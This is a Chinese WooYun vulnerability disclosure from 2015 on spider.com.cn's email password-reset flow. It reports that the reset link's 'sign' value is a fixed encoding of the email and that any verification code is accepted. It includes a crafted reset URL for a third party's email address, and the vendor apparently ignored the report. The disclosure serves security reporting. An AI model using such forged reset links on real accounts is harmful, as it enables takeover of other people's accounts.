漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0111950
漏洞标题:蜘蛛网重置任意用户密码#3
相关厂商:spider.com.cn
漏洞作者: 外星人
提交时间:2015-05-04 16:40
修复时间:2015-05-09 16:42
公开时间:2015-05-09 16:42
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
感谢CCTV赞助商采访
感谢WOOYUN大力支持
本漏洞由蜘蛛网全程赞助 独家冠名播出
详细说明:
蜘蛛网重置共5发。
前2次重置都以手机为例, 这次研究下邮箱。 收到如下链接
http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=560236&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=15431BCC4B0F7C31E0742FC72DE46F3928D20A07DE91CC3767049198F0818D3FF877D2D39083FA845D40908365E76E88
经过七七四九天的磨练, sign 是固定的,是邮箱加密, 有用信息就是这么多, 前面那6位数字,和数字后面那段,不知道是什么鬼东西, 都是装饰
现在找了个邮箱xjh22222228@163.com 就用这个示范
构造链接如下
http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=111111&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=74D3E2DA8132404D5485B918CABAA10851B1F2B79E0E14F5D70CE4B363ED710BD17AAFED3DB5B39F6D1C21FB547F93599F0BC118A451F187C1C029B2C3978A3F
看到上面链接, 和最上面的链接哪里不一样了没, code 都是随便填的 111111
漏洞证明:
修复方案:
礼物啊,我去去 去
版权声明:转载请注明来源 外星人@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-09 16:42
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无